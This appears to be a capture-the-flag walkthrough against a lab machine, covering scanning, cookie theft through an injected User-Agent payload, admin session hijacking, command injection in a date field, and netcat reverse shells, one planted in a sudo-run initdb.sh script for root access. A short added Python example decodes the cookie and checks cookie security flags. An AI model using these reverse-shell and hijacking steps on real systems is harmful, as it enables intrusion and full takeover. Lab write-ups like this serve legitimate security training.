Ping

Nmap Scans
mapit 10.10.11.8
Nmap Default Scan

Nmap Script and Service Scan

Nmap All Port Scan

Gobuster Scan
gobuster dir -u http://10.10.11.8:5000 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x php,html,txt,bak,aspx -s 200,204,301,302,307,403 -b "" -k -o gobustet.txt
Tried to steal cookies


So I have added the payload in the User-Agent as well,
then forwarded and got some cookie

I can see that in my web server

Will use this cookie and try to authenticate as a legitimate user
Decode base64 hash

Normally I can’t access the dashboard

But now we can use the cookie to authenticate
I have changed the new cookie
Will forward and see, it worked…!
is_admin=ImFkbWluIg.dmzDkZNEm6CK0oyL1fbM-SnXpH0
Got the admin’s dashboard, also changed the admin cookies via the developer tools, so I won’t lose the admin’s dashboard.
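Added example, not part of the original write-up: it decodes the is_admin value shown above without any key and checks a Set-Cookie header for the attributes that keep a session cookie away from injected script. The two header strings and the function names are constructed for illustration; the write-up does not show the real response headers.

```python
import base64
import json

# Cookie value exactly as it appears in the write-up.
COOKIE_VALUE = "ImFkbWluIg.dmzDkZNEm6CK0oyL1fbM-SnXpH0"
# Constructed Set-Cookie header values (assumed attributes, not captured from the target).
WEAK_HEADER = "is_admin=" + COOKIE_VALUE + "; Path=/"
HARDENED_HEADER = WEAK_HEADER + "; HttpOnly; Secure; SameSite=Strict"


def b64url_decode(segment):
    """Decode URL-safe base64 whose '=' padding was stripped."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def inspect_signed_value(value):
    """Split '<payload>.<signature>' and decode both parts; no key is needed."""
    payload_b64, sep, sig_b64 = value.rpartition(".")
    if not sep:
        raise ValueError("expected '<payload>.<signature>'")
    raw = b64url_decode(payload_b64)
    try:
        payload = json.loads(raw)
    except ValueError:
        payload = raw.decode("utf-8", "replace")  # not JSON: show as text
    # The signature is opaque without the server key; only its length is visible.
    return {"payload": payload, "signature_bytes": len(b64url_decode(sig_b64))}


def missing_cookie_flags(set_cookie_value):
    """Return the protective attributes absent from one Set-Cookie header value."""
    attrs = {
        part.strip().split("=", 1)[0].lower()
        for part in set_cookie_value.split(";")[1:]
        if part.strip()
    }
    return [flag for flag in ("httponly", "secure", "samesite") if flag not in attrs]


if __name__ == "__main__":
    print(inspect_signed_value(COOKIE_VALUE))
    print("weak:", missing_cookie_flags(WEAK_HEADER))
    print("hardened:", missing_cookie_flags(HARDENED_HEADER))
```

The signature stops the payload from being edited, but a copied cookie is still accepted as-is, so the HttpOnly attribute is the control that matters against script-based theft.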
Will Jump to Initial Foothold…!
I have generated the report, nothing happened

Will inject something in the date field
whoami

Will get a reverse shell
nc -e /bin/sh 10.10.14.3 4444

Got it…!

User.txt

Will Jump to Privilege Escalation…!
Our Privilege
sudo -l

Will check that
sudo /usr/bin/syscheck

Will read the binary
we can edit initdb.sh
Will add reverse shell script
echo "nc -e /bin/sh 10.10.14.3 1234" > ./initdb.sh

Change permissions
chmod +x initdb.sh

Will run the binary now
sudo /usr/bin/syscheck

Got shell as root…!

Root.txt
